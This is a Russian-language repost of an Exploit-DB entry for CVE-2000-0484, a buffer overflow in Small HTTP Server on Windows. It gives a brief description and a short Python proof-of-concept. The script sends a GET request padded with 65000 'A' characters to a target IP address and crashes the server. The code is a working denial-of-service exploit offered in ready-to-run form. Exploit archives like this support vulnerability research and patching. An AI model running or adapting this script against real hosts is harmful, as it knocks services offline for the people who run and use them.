- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 20017
- Проверка EDB
-
- Пройдено
- Автор
- USSR LABS
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2000-0484
- Дата публикации
- 2000-06-16
Код:
source: https://www.securityfocus.com/bid/1355/info
A buffer overflow is present in certain versions of the Small HTTP Server . The overflow in question is triggered by an overlong (65000 or more characters) malformed HTTP GET request to the webserver.
#!/usr/bin/python
#
# Small HTTP Server DoS Proof of Concept Code.
# Vulnerability Discovered by USSR Labs(http://www.ussrback.com)
# Simple Script by Prizm([email protected])
#
# By connecting to port 80(http) on a system running Small HTTP Server
and issuing a GET
# command followed by 65000 bytes, the service will crash.
#
# This *simple* little script will cause http.exe to crash.
import httplib
h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip
h.putrequest('GET', 'A' * 65000)
#end- Источник
- www.exploit-db.com
